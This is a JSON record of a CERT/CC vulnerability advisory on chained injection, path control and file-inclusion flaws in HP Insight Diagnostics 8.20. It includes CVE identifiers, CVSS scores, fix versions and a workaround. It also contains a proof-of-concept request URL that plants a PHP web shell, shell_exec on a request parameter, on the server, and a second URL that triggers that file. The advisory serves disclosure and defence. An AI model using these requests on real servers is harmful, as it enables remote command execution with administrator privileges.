{"vuid":"VU#324668","idnumber":"324668","name":"HP Insight Diagnostics 8.20 b2878 multiple vulnerabilities","keywords":["hp","insight","diagnostics","cwe-73","cwe-74","cwe-98"],"overview":"HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contain multiple vulnerabilities.","clean_desc":"It has been reported that HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contain multiple vulnerabilities that can be exploited by a remote attacker to execute arbitrary PHP code, and thus arbitrary commands, with administrative privileges.\nCWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') - CVE-2013-3573\nCWE-73: External Control of File Name or Path - CVE-2013-3574\nHP Insight Diagnostics contains two vulnerabilities that together allow an attacker to inject arbitrary data into a file that is stored at an arbitrary location on the server via the \"devicePath\" parameter (formerly \"mount\" in older versions).\nhttps://<host>:2381/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes\nCWE-98: Improper Control of Filename for Include/Require Statement in PHP Program - CVE-2013-3575\nHP Insight Diagnostics contains a local file inclusion vulnerability that is limited to \".html\" inside the \"<document-root>/hpdiags/frontend2/help/\" directory.\nhttps://<host>:2381/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html","impact":"By combining these vulnerabilities, an authenticated remote attacker may be able to execute arbitrary commands on the server with administrator privileges.","resolution":"We are currently unaware of a practical solution to this problem. 
CVE-2013-3573 - Fixed in HP Insight Diagnostics 8.20 b2878\nCVE-2013-3574 - Fixed in HP Insight Diagnostics 9.52\nCVE-2013-3575 - Fixed in HP Insight Diagnostics 9.52","workarounds":"Restrict Network Access\nAs a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from connecting to the service from a blocked network location.","sysaffected":"","thanks":"Thanks to Markus Wulftange from Daimler TSS for reporting this vulnerability.","author":"This document was written by Michael Orlando.","public":["http://cwe.mitre.org/data/definitions/73.html","http://cwe.mitre.org/data/definitions/74.html","http://cwe.mitre.org/data/definitions/98.html","http://www.hp.com/servers/diags","http://bizsupport2.austin.hp.com/bc/docs/support/SupportManual/c03652816/c03652816.pdf"],"cveids":["CVE-2013-3573","CVE-2013-3574","CVE-2013-3575"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2013-04-02T17:09:50Z","publicdate":"2013-06-10T00:00:00Z","datefirstpublished":"2013-06-10T12:55:06Z","dateupdated":"2014-07-30T06:35:47Z","revision":17,"vrda_d1_directreport":"1","vrda_d1_population":"3","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"N","cvss_accesscomplexity":"L","cvss_authentication":null,"cvss_confidentialityimpact":"P","cvss_integrityimpact":"P","cvss_availabilityimpact":"P","cvss_exploitablity":null,"cvss_remediationlevel":"U","cvss_reportconfidence":"UC","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"6.5","cvss_basevector":"AV:N/AC:L/Au:S/C:P/I:P/A:P","cvss_temporalscore":"5","cvss_environmentalscore":"1.24748266428844","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}